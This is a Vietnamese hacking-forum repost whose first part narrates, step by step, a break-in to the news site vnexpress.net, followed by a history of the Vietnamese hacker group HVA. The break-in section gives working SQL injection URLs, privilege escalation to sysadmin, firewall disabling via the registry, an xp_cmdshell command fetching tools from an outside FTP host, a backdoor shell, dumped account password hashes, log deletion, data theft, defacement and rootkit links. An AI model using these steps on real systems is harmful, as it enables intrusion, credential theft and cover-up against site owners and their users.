Messages posted by: caothuvolam

Origin post from vkdt.

Thỏa hiệp VnExpress.NET

Đây là từng buớc mà mình đã làm để thỏa hiệp website http://vnexpress.net/.

Để an toàn khi hack, mình set lại proxy trong IE5 là proxy.ia2.marketscore.com:80. Xong, bây giờ bắt đầu vào http://vnexpress.net/. Loay hoay một chặp trên VnExpress để tìm lỗi SQL Injection, mục Rao Vặt:

http://vnexpress.n et/User/Rao-vat/Source/View.asp?ID=500006378&c=3'

HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services

Error Type:
Unclosed quotation mark before the character string '' /User/Rao-vat/Source/Detail.Asp, line 114

Yeah!

Mình thử dùng các kí tự khác ngoài dấu ': " , ( ) để biết được chính xác URL khai thác:

http://vnexpress.net/User/Rao-vat/Source/V...=500006378&c=3) ...

Bây giờ đến việc tiến hành xâm nhập vào máy chủ này qua lỗi SQL Injection!

- Đầu tiên mình xác định xem phiên bản của MSSQL và Windows NT:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=50000 6378&c=3) and 1=convert(int,@@version)--sp_password

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.655 (Intel X86) Jul 3 2002 18:10:57 Copyright © 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

(Để tránh ghi nhật kí trong MSSQL, mình thêm sp_password vào sau --. Khi MSSSQL phát hiện ra chuổi 'sp_password' trong câu lệnh SQL, nó sẽ ghi nhật kí như sau: -- 'sp_password' was found in the text of this event. -- The text has been replaced with this comment for security reasons.. Để cho đơn giản, từ đây mình sẽ ghi tắc --sp_password là -- nha)

+ SQL 2000 8.00.655 03/07/2002
+ Windows 2000 5.0 Build 2196 SP3

- Mình xác định tiếp tên người dùng hiện tại và tên CSDL đang làm việc:

http://vnexpress.net/User/Rao-vat/Source/V...p?ID=500006378& c=3) and 1=convert(int,system_user)--

Syntax error converting the nvarchar value 'IUSR_WIN10814' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/V...ID=500006378&c= 3) and 1=convert(int,db_name())--

Syntax error converting the nvarchar value 'Infostore' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Username hiện tại không phải là sa hoặc BUILTIN\Administrators nên không thể xài master..xp_cmdshell. SQL ngày 03/07/2002, đang chạy với Windows Authentication user là IUSR_WIN10814, hơi cũ so với ngày hiện tại. Mình vào trang http://www.securiteam.com/ và search các lỗi của MSSQL đã được công bố sau ngày 03/07/2002. Đây là thứ mà mình tìm:

NGSSoftware Insight Security Research Advisory

Name: Extended Stored Procedure Privilege Upgrade
Systems: Microsoft SQL Server 2000 and 7
Severity: High Risk
Category: Privilege Escalation
Vendor URL: [url=http://www.microsoft.com/
Author:]http://www.microsoft.com/
Author:[/url] David Litchfield (david@ngssoftware.com)
Advisory URL: [url=http://www.ngssoftware.com/advisories/mssql-esppu.txt
Date:]http://www.ngssoftware.com/advisories/mssq...
Date:[/url] 15th August 2002
Advisory number: #NISR15002002A

Description
***********
Microsoft SQL Server 2000 and 7 extends functionality by using extended
stored procedures. Three particular extended stored procedures contain a
vulnerability that allow a low privileged user to run abritrary SQL queries
in the context of the
account running SQL Server.

Details
*******
SQL Server supports two forms of authentication. The first is where a user
uses an SQL login and password to authenticate and the second is through
Windows Authentication. Any user authenticated by Windows can "upgrade"
their privileges to that of the account running the SQL Server by using one
of three extended stored procedures. These stored procedures allow a user to
run an arbitrary SQL query. By exploiting this problem a low privileged user
will be able to run any stored procedure, extended or otherwise, and select
from, update or insert into any table in any database. That is by exploiting
these holes an attacker can fully compromise the database server and its
data. Whilst an SQL Login user can not directly exploit this vulnerability
they can do so indirectly by submitting a job to the SQL Agent. As this the
SQL Agent authenticates to the SQL Server and runs in the context of Windows
account these vulnerabilities can be exploited. Please see NGSSoftware alert
NISR15002002A http://www.ngssoftware.com/advisories/mssql-esppu.txt) for
more details.

Fix Information
***************
NGSSoftware informed Microsoft of these issues in July. Microsoft has
produced a patch that resolves these issues. Please see

http://www.microsoft.com/technet/treeview/...chnet/security/
bullet in/MS02-043.asp

for more details.

For those SQL Server database administrators who are not able to patch
immediately NGSSoftware recommend that they remove public access to these
stored procedures. This will prevent low privileged users from accessing
these extended stored procedures.

xp_execresultset
xp_printstatements
xp_displayparamstmt

A check for this vulnerability has been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/. Username hiện tại là IUSR_WIN10814, thuộc loại Windows Authentication nên chúng ta có thể dùng xp_displayparamstmt để nâng quyền của username này lên dbo.

http://vnexpress.net/User/Rao-vat/Source/View.asp? ID=500006378&c=3);exec master..xp_displayparamstmt N'sp_addsrvrolemember ''IUSR_WIN10814'',''sysadmin''',N'master',1--

Mình add user IUSR_WIN10814 vào nhóm sysadmin để có thể dùng được master..xp_cmdshell

Xác định lại username hiện tại xem sao?

http://vnexpress.net/User/Rao-vat/Source/V...p?ID=500006378& c=3) and 1=convert(int,user_name())--

Syntax error converting the nvarchar value 'dbo' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

DBO - Chúng ta đang có quyền hạn cao nhất trên máy chủ MSSQL đó nha.

Tiếp theo mình xác định địa chỉ IP của máy chủ này như sau:

Đầu tiên tạo một bảng chứa dữ liệu và đổ kết quả của lệnh exec master..xp_cmdshell 'ipconfig' vào bảng này.

http://vnexpress.net/User/Rao-vat/Source/V...378&c=3);create table systables(a int identity,b varchar(1000)) insert into systables exec master..xp_cmdshell 'ipconfig'--

Việc còn lại là lấy kết quả từ bảng systables:

http://vnexpress.net/User/Rao-vat/Source/V...=500006378&c=3) and 1=convert(int,(select top 1 b from systables where b like '%25IP Address%25'))--

(%25 == "%")

Syntax error converting the nvarchar value ' IP Address. . . . . . . . . . . . : 10.244.63.231 ' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/V...p?ID=500006378& c=3) and 1=convert(int,(select b from systables where b like '%25IP Address%25') and b not in('%2510.244.63.231%25'))--

Syntax error converting the nvarchar value ' IP Address. . . . . . . . . . . . : 198.64.129.137 ' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/Vie w.asp?ID=500006378&c=3) and 1=convert(int,(select b from systables where b like '%25IP Address%25') and b not in('%2510.244.63.231%25','%25198.64.129.137%25'))--

Syntax error converting the nvarchar value ' IP Address. . . . . . . . . . . . : 198.64.132.21 ' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/V...006378&c=3) and 1=convert(int,(select b from systables where b like '%25IP Address%25') and b not in('%2510.244.63.231%25','%25198.64.132.21%25','%25198.64.129.137%25','%25198.64.132.21%25'))--</ A>

Syntax error converting the nvarchar value ' IP Address. . . . . . . . . . . . : 198.64.132. 22' to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Hì hì, nó có đến 4 địa chỉ IP luôn!

Mình thử ping đến vnexpress.net để xem thử địa chỉ IP của Web Server ra sao?

C:\>ping vnpress.net

Pinging vnexpress.net [198.64.132.22] with 32 bytes of data:

Reply from 198.64.132.22: bytes=32 time=344ms TTL=105
Control-C

Như vậy IIS và MSSQL đều được cài trên cùng một máy chủ.

Thử nối đến cổng cổng 1433 bằng Netcat xem sao?

C:\>nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?): connection refused
sent 0, rcvd 0: NOTSOCK

VnExpress.NET đã đặt tường lửa cho cổng 1433 rồi. Mình nghĩ khả năng lớn nhất là họ đã dùng tường lửa lọc cổng dữ liệu đi kèm với Windows 2000 Server. Mình quyết định phá tường lửa này.

http://vnexpress.net/User/Rao-vat/Source/V...06378&c=3);exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Services/Tcpip/Parameters','EnableSecurityFilters' --

Chỉ cần del giá trị EnableSecurityFilters trong khóa HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters là xong.

Nối lại xem sao?

C:\>nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?) open

Đúng y như mình đã dự đoán!

Bây giờ đến việc upload backdoor và một vài đồ nghề khác lên server. Mình chuẩn bị sẵn mấy thứ này trong thư mục /vnexpress trên máy chủ FTP free-hosting. Bởi vì việc lấy các file trên FTP hơi lâu nên nếu dùng IE5 thì kết sẽ bị ngắt nữa chừng do lỗi timeout (đang xài kết nối quay số ở ngoài dịch vụ mà) nên mình chuyển sang xài Mini-Browser (*Mini-Browser là một đồ nghề không thể thiếu được khi hack web). Set lại proxy cho Mini-Browser là proxy.ia2.marketscore.com:80 cho chắc.

http://vnexpress.net/User/Rao-vat/Source/V...06378&c=3);exec master..xp_cmdshell 'echo open ftp.esmartweb.com >f & echo user username xxxxx >>f & echo bin >>f & echo cd /vnexpress >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f'--

URLEncode -> http://vnexpress.n et/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec%20master..xp_cmdshell%20'echo%20open%2 0ftp.esmartweb.com%20%3Ef%20%26%20echo%20user%20username%20xxxxx%20%3E%3Ef%20%26%20echo%20bin%20% 3E%3Ef%20%26%20echo%20cd%20/vnexpress%20%3E%3Ef%20%26%20echo%20mget%20*%20%3E%3Ef%20%26%20echo%20 quit%20%3E%3Ef%20%26%20ftp%20-v%20-i%20-n%20-s%3Af'--

[GET]

Waiting...!
Done.

Kích hoạt backdoor WinShell 4.0:

http://vnexpress.net/User/Rao-vat/Source/V...06378&c=3);exec master..xp_cmdshell 'backup'--

Xong, bây giờ chỉ việc kết nối đến backdoor WinShell. Mình dùng Putty để nối

+ Host Name (or IP Address): 198.64.132.22
+ Port: 3371
+ Protocol: (o) Raw

xxxxx

WinShell v4.0

©2001 by janker

http://www.bugsos.com/

? for help
CMD>s
C:\WINNT\system32>_

- Đổ SAM

Administrator:500:C3591A674B80231AF24E41BBADB86F3F:B0F92BB2E3471150BEC31733D6728
8EA:Built-in account for administering the computer/domain::
Guest:501:********************************:********************************: Built-in account for guest access to the computer/domain::
TsInternetUser:1000:DFA15ABF9536AE19F7FF965C044A5116:D21C509DA73030AD8DA1014 F3A211943:TsInternetUser,This user account is used by Terminal Services.::
IUSR_WIN10814:1001:9C0887DCB5F1EA859B0B497A5C75047F:A9438645CA94E67F631C2E14E1CD
F7 D4:Internet Guest Account,Built-in account for anonymous access to Internet Information Services::
IWAM_WIN10814:1002:A4BE543712EDBA21B0991B757487A81E:BCE493DFA35602091F9285CAEABA
312 8:Launch IIS Process Account,Built-in account for Internet Information Services to start out of process applications::
Internet:1003:336F31071CA2B4A0D14C9408F0C70C13:80C82BA8E876F8D59732AC429A93072B :Internet,FPT Internet admin access::
vReplicator:1004:578BFE097611D01A73545BB507664033:AF30E872418F24EC3FD86F58CB8F0D
FD:Re plicate Site::
AdminEditor:1005:A07C0994B7D99B918284770D91848144:121CF5A2FB538FC2EF4918C69EC291
16:Admi n Editor::
Thangpv:1006:F138C587F87CB06E29B1F66481A851EE:7AA75649EA242FE1FD76191279F2F407:P
ham Vinh Thang::

- Xác định WWROOT của IIS

C:\WINNT\system32>reg query "hklm\system\currentcontrolset\services\w3svc\parameters\virtual roots"
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\w3svc\parameters\virtual roots
/ REG_SZ D:\Infostore\Master,,201
/IISHelp REG_SZ C:\WINNT\Help\iisHelp,,201
/Replicate REG_SZ D:\InfoStore\Replicate,,201

- Xóa nhật kí của IIS (thật sự thì mình không hề bị ghi nhật kí vì Admin của VnExpress.NET đã disable log của IIS do số lượng người truy cập vào trang web này quá đông)

C:\WINNT\system32>reg query hklm\system\currentcontrolset\services\w3svc\parameters /v logfiledirectory
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\w3svc\parameters
logfiledirect ory REG_SZ C:\WINNT\System32\LogFiles

C:\WINNT\system32>
C:\WINNT\system32>dir %systemroot%\system32\logfiles
Volume in drive C has no label.
Volume Serial Number is 5C62-FB1E

Directory of C:\WINNT\system32\logfiles

04/19/2002 12:26a <DIR> .
04/19/2002 12:26a <DIR> ..
04/19/2002 07:24a <DIR> W3SVC1
0 File(s) 0 bytes

C:\WINNT\system32>rd /s /q logfiles\w3svc1

- Để xem có gì trong WWROOT không?

D:\InfoStore>dir
Volume in drive D is InfoStore
Volume Serial Number is 544E-1C8D

Directory of D:\InfoStore

04/25/2002 08:39a <DIR> .
04/25/2002 08:39a <DIR> ..
04/19/2002 10:44a <DIR> ftproot
09/20/2002 03:29p <DIR> Master
10/01/2002 01:10p <DIR> Replicate
0 File(s) 0 bytes
5 Dir(s) 46,340,067,328 bytes free

Cả khối file tin tức trong thư mục Master. Mình thấy chỉ có Replicate và một số ít các file trong Master là còn có giá trị nên download về.

C:\WINNT\system32>rar -a f.zip d:\infostore\replicate\*.*
C:\WINNT\system32>copy /y f.zip d:\infostore\master\readme.txt

(dùng Mass Downloader để download file http://vnexpress.net/readme.txt về)

C:\WINNT\system32>del d:\infostore\master\readme.txt

... và một số việc khác nữa không kể ra ở đây tới.

*Server của VnExpress.NET chẳng có thứ gì ngoài mấy cái tin tức cung cấp miễn phí cho mọi người nên mình quyết định stop tại đây, không xóa bất kì file nào trên server đâu nha. Mình chỉ upload vài file để deface trang VnExpress.NET cho vui thôi.

- À nếu bạn cần cài backdoor/rootkit không bị phát hiện trên Windows NT thì dùng Hacker Defender http://rootkit.host.sk/) hoặc TYT ( http://www.polarhome.com/~vickit/tyt0/ , mã nguồn: http://www.polarhome.com/~vic ki/hack/congcu/win/tyt0-src.zip) của mình nha. * Hiện tại bản Hacker Defender 0.7.3 không làm việc trên Windows 2000 bản Enterprise. Mình đã test thử trên vài server rồi, trong khi backdoor của mình thì vẫn làm việc tốt đối với bản Enterprise. Khi nào có source-code của HxDef mình sẽ phát triển tiếp con backdoor của mình để cho các bạn xài. Nói thật là mấy thứ backdoor và rootkit này cũng rất dễ bị phát hiện và disable. Hì hì, không nói ở đây nha (để cho an toàn thôi)

Bài viết này được viết cách đây 3 năm, hiện nay đang được tiếp tục bổ sung thêm những thông tin cập nhật nhất.

TÓM LƯỢC QUÁ TRÌNH HÌNH THÀNH VÀ PHÁT TRIỂN CỦA HACKER VIỆT NAM

Trước tiên, chúng tôi xin tóm lược sơ qua về lịch sử hình thành, các giai đoạn phát triển của giới hacker Việt Nam nói chung. Chúng tôi viết dựa trên các mốc lịch sử của HVA bởi đây là một trong những website về hacking lớn và lâu đời nhất tại Việt Nam. Có thể phân chia thành 4 điểm mốc chính sau:

1. Giai đoạn tiền HackerVN

1.1. Thời công xã nguyên thuỷ: HackerVN, họ là ai?? À, đó là những anh chàng “chuyên” sưu tầm các virus trên mạng dạng *.exe, đính kèm (attach) vào email và gửi cho người khác. Thế thôi! Những “hacker” này chủ yếu tụ tập ở mạng “Trí Tuệ Việt Nam” của FPT, và một ít ở các mạng Intranet khác. Họ có mặt từ trước khi Internet xuất hiện tại Việt Nam, khoảng từ năm 1997 về trước.

1.2. Thời hái lượm, săn bắt: Cũng xuất phát từ mạng “Trí tuệ Việt Nam”, các user lão luyện đã bắt đầu nghiên cứu về một thứ mới mang lại cho họ nhiều lợi ích hơn: trojan horse, các ứng dụng mạng .v.v.. Đây cũng là giai đoạn internet bắt đầu xuất hiện tại Việt Nam với mục đích dân dụng phổ thông, khoảng năm 1997 – 1998. Tiểu biểu cho thế hệ này có thể kể trungmanh@hn.fpt.vn hay còn gọi là Trungonly.

1.3. Thời kỳ “đồ đá”: Đến thời kỳ này thì một số người lên Internet lâu ngày bắt đầu nắm bắt một số kỹ thuật cơ bản về crack, virus .v.v.. Họ dần dần nghĩ đến việc tụ tập lập hội, nhóm nhằm trao đồi thông tin, ý tưởng về những kỹ thuật đó. Tiêu biểu có NVH©, Tamk , LPTV, nhưng thường thì mỗi người vẫn giấu lại những “tuyệt chiêu” cho riêng mình. Nói chung, mối quan hệ hay tính chuyên nghiệp trong thời kỳ này còn sơ khai lắm, cũng như chưa định hình rõ ràng “hacker” là gì? làm thế nào để trở thành hacker? và đã là hacker thì phải làm gì .v.v.. cho đến khi HackerVN chính thức thành lập.

2. Giai đoạn HackerVN xuất hiện

2.1. Giai đoạn người hiện đại (chúng tôi gọi đây là giai đoạn HackerVN): Đánh dấu bằng sự xuất hiện của HackerVN. Việc truyền đạt các kiến thức về lỗ hổng bảo mật .v.v.. không hạn chế đã đem lại một hướng đi và sức phát triển thần kỳ cho tin học Việt Nam, đặc biệt trong lĩnh vực bảo mật. Điểm nổi bật nhất của giai đoạn này là đã bắt đầu xuất hiện việc giới hacker trong nước đã gặp gỡ, học hỏi nhiều từ những hacker trình độ cao ở nước ngoài. Các hacker “Việt kiều” đã bắt đầu góp mặt. Những người tiêu biểu ở giai đoạn này có: 13013, Tim, Dark Angel .v.v.. Đây cũng là lúc Internet đang dần tương đối phổ biến ở Việt Nam.

2.2. Giai đoạn hợp nhất (chúng tôi gọi đây là giai đoạn HVA): Sự hợp nhất của HackerVN với CLB mật mã tạo nên tên gọi mới, HVA. Việc hợp nhất hai nhóm hacking lớn nhất thời bầy giờ, cùng với việc phổ biến đại trà các kiến thức về bảo mật của HackerVN đã dẫn đến “vấn nạn account chùa” từng một thời làm điêu đứng các ISPs và những người sử dụng internet Việt Nam. Ai đã từng tham gia giai đoạn này hẳn đã nghe nói: “Sống với internet hay chết với VDC” - khẩu hiệu của “giáo chủ” 13013 “thánh chiến” kình chống nhau với các ISPs vì giá internet quá cao, đến nổi đã có người đặt dấu chấm hỏi về tương lai của Internet Việt Nam. Những người tiêu biểu xuất hiện trong giai đoạn này có: lthlthp, Zerone .v.v..

3. Giai đoạn hậu HackerVN

HVA, cũng như đa phần các tổ chức hacking hiện hữu, đã chuyển từ một tổ chức chuyên đánh cắp account sang nghiên cứu bảo mật. Đặc biệt về các bug Unicode của dòng sản phẩm IIS của Micro$oft. Tuy nhiên, sự chuyển hướng này - tưởng như là một nỗ lực tốt của các admin bấy giở nhằm chấm dứt nạn đánh cắp account – đã trở nên tồi tệ hơn bao giờ hết khi các lỗi này bị các thành viên liên tục sử dụng để hack các website Việt Nam. Thế là các cơ quan chức năng vào cuộc, và HVA tạm đóng cửa. Đây cũng là giai đoạn các ISPs kiên quyết nặng tay với hacker và truy thu rất gắt tiền sử dụng internet “lậu” cũng như tăng cường biện pháp bảo vệ người dùng internet. Những người tiêu biểu giai đoạn này: ThamTu, Master of RA (tên khác của 13013), Khoaimi, Verciny .v.v..

4. Giai đoạn tân HVA

HVA phát triền trở lại với một hướng đi hoàn toàn khác, với tính chuyên nghiệp cao hơn gấp bội và trình độ cũng cao hơn. Đây cũng là giai đoạn Viethacker, Hacker Club xuất hiện và hoạt động mạnh. Những người tiêu biểu trong giai đoạn này là: JAL, Triệu Tử Long, UFO, KHA, LPTV, MSVN .v.v..

Với HVA thì đây được xem là giai đoạn chuyển tiếp thực sự từ hacking sang security một cách nghiêm túc và có tổ chức. Giai đoạn này đánh dấu bằng việc chuyển tiếp sang thời kỳ HVA phát triển cực thịnh trong tất cả các mặt kể từ khi thành lập đến nay .v.v.. Và chúng tôi tin rằng trong tương lai HVA sẽ còn tiếp tục lớn mạnh hơn nữa, và vẫn luôn là một trong những tổ chức hàng đầu của Việt Nam về hacking and security.

BIÊN NIÊN SỬ HACKERVN – HVA

Bây giờ, chúng tôi xin đi sâu hơn vào biên niên sử của HackerVN – HVA thân yêu của chúng ta!

Thưa các bạn! Tổ chức nào thì cũng phải trải qua một quá trình hình thành và phát triển lâu dài nếu muốn tồn tại được. HackerVN.net - HVA - một trong những tổ chức lớn nhất tại Việt Nam về lĩnh vực hacking and security - cũng không ngoài thông lệ đó. Chúng ta đã trải qua những giai đoạn hết sức cam go, những thử thách vô cùng lớn trước khi đạt được được những thành tựu mà chúng ta đang cùng thụ hưởng như ngày hôm nay. Để giúp các bạn hiểu rõ hơn về tổ chức của HVA, chúng tôi xin ghi lại một phần lịch sử hình thành phát triển của HVA. Và mong rằng tất cả chúng ta hãy cùng nhau nhìn lại quá khứ đó, hiểu được nó, để không ngừng phấn đấu, hướng đến một tương lai tốt đẹp hơn cho HVA – HackerVN, cho nền CNTT nước nhà nói chung, và về lĩnh vực hacking and security nói riêng.

Xin các bạn nhớ cho:“Những gì chúng ta được đọc ở đây chính là lịch sử mà các bậc đàn anh đi trước đã làm, và những gì chúng ta đang làm bây giờ cũng chính là lịch sử với các thế hệ tiếp sau đó các bạn ạ”!

Thời kỳ Đệ nhất cộng hòa: HackerVN – Cái thưở ban đầu lưu luyến ấy!

Tất cả chúng ta đều biêt trước khi mang tên HackerVN - HVA như hiện nay, HVA đã qua nhiều giai đoạn phát triển với nhiều tên gọi, và nhiều “hộ khẩu” khác nhau. Tiền thân của HVA là forum HackerVN, lần đầu được đưa lên mạng và lưu trữ tại địa chỉ www.thefreeforum.com/hackervn/ - đó là vào khoảng tháng 5, 6 năm 1999. Mục đích thành lập của forum là quảng bá kiến thức về IT nói chung và các kiến thức về lỗ hổng bảo mật, hacking nói riêng trong điều kiện internet Việt Nam còn chưa được phổ biến rộng. Những nhân vật chính kiến tạo nên HVA lúc này phải kể đến 13013 và Dark Angel.

Tuy nhiên, vừa khai trương chưa đến một tuần, admin lúc đó của HackerVN là “13013” đã công bố một lỗi bảo mật nghiêm trọng của thefreeforum, và kết quả là website này sau đó phải tạm đóng cửa. Và thế là hoạt động của HackerVN cũng tạm dừng nên buộc phải dời hộ khẩu sang chỗ khác an toàn hơn. Rồi thời gian tiếp theo chúng ta nghe nói đến HackerVN qua những địa chỉ thân quen như braveman.hypermart.net rồi zerone.hypermart.net .v.v..

Cũng trong thời gian này, HackerVN nổi danh với vai chính trong cái gọi là “cơn sốt forum” tại Việt Nam. Ngay từ rất sớm, khoàng cuối tháng 6, đầu tháng 7 năm 1999, HackerVN được xem là một trong những forum đầu tiên của Việt Nam sử dụng UBB (Ultimate Bulletin Board) để code forum cho riêng mình, với nhiều chức năng hơn hẳn những đối thủ cùng lĩnh vực đương thởi như: CLB mật mã, HKC, Vncracking .v.v.. Điều này đem lại cho HackerVN sự nổi tiếng, sự phát triển nhảy vọt đến không ngờ, và kéo theo đó là lượng thành viên tham gia đông đảo. HackerVN nhanh chóng trở thành một trong thế lực hùng mạnh nhất trong làng hacking Việt Nam. Không những thế, HVA còn là một trong số ít những website phi thương mại Việt Nam có domain riêng: www.hackervn.com, kể từ 1999. Tóm lại, HackerVN đã có một bước khởi đầu khá tốt đẹp, khi gia nhập làng Hacking Việt Nam.

Thời kỳ Đệ nhị Cộng hòa: HackerVN hợp nhất - Cuộc “cách mạng” Sex và Account chùa!

Giai đoạn mới này được đánh dấu bằng sự kiện nổi đình nổi đám nhất trong làng hacking lúc bấy giờ là HackerVN cùng với CLB mật mã (do trungonly làm trùm) đã hợp nhất làm một và đổi tên gọi mới HVA, domain là hackervn.org. Sự hợp nhất này đã gia tăng thêm nhiều sức mạnh cho tổ chức HVA mới. Mặc nhiên, HVA tiếp tục được xem là một trong những tổ chức hacking lớn nhất tại Việt Nam cũng như toàn cõi Đông Dương lúc bấy giờ. smilie

Thời điểm này thì ở Việt Nam đã xuất hiện khá nhiều tổ chức hoạt động trong lĩnh vực hacking và cracking. Cũng cần lưu ý là tuy có xuất hiện nhiều thật, nhưng không hề có “chiến tranh” giữa các tổ chức với nhau.

Sau khi hợp nhất, vương triều HVA được đặt dưới sự điều khiển của “trùm sò” 13013 và Trungonly, các hoạt động thì vẫn tuân theo những tiêu chí đề ra thửơ ban đầu. Tuy nhiên, vào thời điểm mà "giá cước internet còn đắt hơn vàng", và quan trọng hơn là do cung cách tổ chức quản lý, đội ngũ quản trị forum chưa có nhiều kinh nghiệm, nếu không muốn nói là quản lý quá kém, đồng thời lại chưa tạo được định hướng hoạt động nghiêm túc, nên các thành viên của HVA nhanh chóng bị lôi vào vòng xoáy của cái gọi là "vấn nạn account chùa”, gây nên khá nhiều thiệt hại cho các cá nhân, đơn vị, tổ chức .v.v.. Các hacker “thuần” mũ đen đã tiến hành phát tán, tuyên truyền account chùa, sex, bommail .v.v.. một cách điên cuồng như là để chứng minh mình với thế giới bên ngoài rằng HackerVN – HVA đã có mặt và đang tồn tại. Không chỉ có thế, một số thành viên còn liên tiếp tấn công vào hệ thống các websites Việt Nam bất kể lý do .v.v..

Đây có thể nói là thời gian “diễu võ, giương oai”, một kiểu thể hiện cái “tôi”, cái “ngông” của tuổi trẻ bồng bột, hiếu thắng của HVA với bàn dân thiên hạ .v.v.. Và cũng chẳng có gì lạ khi hackerVN bị các phương tiện truyền thông, những công dân người sử dụng internet Việt Nam chỉ trích nặng nề trước những hoạt động có thể nói là hết sức phi pháp đó! Nhiều người lúc đó đã đặt dấu hỏi phải chăng internet Việt Nam đã đi vào ngõ cụt?!... Trước áp lực đó, các cơ quan chức năng có thẩm quyền đã mạnh tay xử lý các hành vi vi phạm của HVA (và nhiều tổ chức khác hoạt động trong cùng lĩnh vực). Một vài người (không phải member chính thức của forum) đã bị cơ quan công an “sờ gáy”, riêng forum thì bị firewall…

Nhưng đó không phải là đòn mạnh cuối cùng giáng vào HackerVN - HVA, ngày 13/06/2001 - ngày định mệnh, nhưng cũng là cột mốc đánh dấu sự biến chuyển trong hoạt động của HVA - hackervn.org bị hack, và bị một người tên vnhacker (lúc đó có tin đồn là phái nữ, nhưng thật ra “trăm phần trăm… đực rựa”, hỗn danh là Thủy – vnhacker@yahoo.com) deface bằng những ngôn từ làm tan nát cõi lòng những ai yêu quý HVA chúng ta! hic hic hic!

Thời kỳ Đệ tam công hòa: Khủng hoảng – Suy thoái – Tan rã

Sau lần đó, HVA đã gần như sụp đổ, “tái tê” trong sự “hả hê” của giới CNTT và người sử dụng internet Việt Nam - vốn ác cảm với HVA trước đây chỉ vì “đại dịch” account “chùa”, vì cái CLB mật mã đậm chất “chùa miếu” ấy! Rất nhiều anh em - kể cả các “trùm” - sinh ra nản lòng nên đã “rửa tay gác kiếm”, có người đi du học, có chàng làm design, có kẻ về với VDC/FPT .v.v..

Có thể nói đây là thời kỳ “đen tối” nhất trong lịch sử HVA. Với số anh em ít ỏi còn lại, cùng sự cố gắng của Onin, Zerone, TTL, forum đã được trở lại hoạt động, tuy khá chập chờn, có lúc phải tạm ngưng. Forum đã được cải tiến tạo nhiều sự đổi mới so với thời kỳ trước, đặc biệt là về nội quy, đường lối hoạt động .v.v.. nhưng do định hướng không kịp thời nên dù hạn chế được rất nhiều nạn account chùa, sex thì vẫn vướng phải tình trạng hack lung tung các website khác, đặc biệt là hack các site chính thống của Việt Nam mà không thể nào kiểm soát nổi .v.v.. Lúc này số lượng thành viên còn lại rất ít, thành viên mới thì không nhiều, nhưng lại hay xảy ra việc “chửi bới”, chỉ trích lẫn nhau, làm mất tình đoàn kết trong số anh em ít ỏi còn lại này .v.v. .

Nói trắng ra, hoạt động của HVA thời gian này chỉ mang tính cầm cự chờ đợi thời cơ phục hưng! Và đã có lúc người ta tưởng trên bản đồ hacking Việt Nam sẽ không còn tồn tại cái tên HVA nữa?! Nhưng điều đang nói hơn cả là sự trổi dậy của Viethacker (VHF) với hành động “đâm sau lưng chiến sĩ ” không thể chấp nhận được của họ. Không hiểu vì lý do gì mà VHF đã ngang nhiên tấn công HVA (đang host ở can-host.com) mà không hề tuyên chiến. Điều này vi phạm trắng trợn luật bất thành văn trong làng hacker Việt Nam: “Không xen vào công việc nội bộ, không xâm hại lẫn nhau giữa các tổ chức hacking Việt Nam”. Và đây chính là điểm mốc khơi màu cho “chiến tranh” giữa hai tổ chức sau này. Sau lần bị tấn công đó, HVA tạm dừng hoạt động, còn domain hackervn.org cũng đã không cánh mà bay. . .

Tóm lại, đây là khoảng thời gian mà ai trong số chúng ta ở đây cũng không muốn gặp lại, nhưng dù gì thì chúng ta cũng phải can đảm nhìn lại để thấy rằng HVA đã phải phấn đấu rât nhiều để có được những thành tựu như ngày hôm nay, và tất cả chúng ta phải trân trọng vì điều đó! Thay mặt các anh em, xin được nói lời tri ân đến những anh em chiến hữu đã hết lòng cùng với HVA sống và vượt qua giai đoạn hết sức khó khăn và đầy thử thách này. Chính những cố gắng này của anh em đã là động lực giúp HVA chúng ta có thể mở ra một trang sử mới, một giai đoạn phát triển mới ở những thời kỳ tiếp theo.

Thời kỳ Đệ tứ cộng hòa: Độc lập - Tự chủ, và Làn gió đổi mới!

Vâng, thời kỳ khủng hoảng đó được chấm dứt bằng một sự kiện lớn diễn ra vào một chiều cuối đông lạnh lẽo của năm 2001 - một trang sử mới của HVA được mở ra - HVA tái xuất giang hồ dưới sự “chấp chính” của hai lãnh tụ là admin Triệu Tử Long, và admin JAL. HVA đã chính thức sử dụng domain mới hackervn.net, và “sang” hơn là đã có thể quên đi cái cảnh “ăn nhờ ở đậu” khi “sắm” server riêng – A Dedicated Server! Đây được xem là nét chấm phá mới, nó thổi vào một luồng gió mới, hứa hẹn mở ra một tương lai mới - Thời kỳ độc lập và tự chủ của HVA.

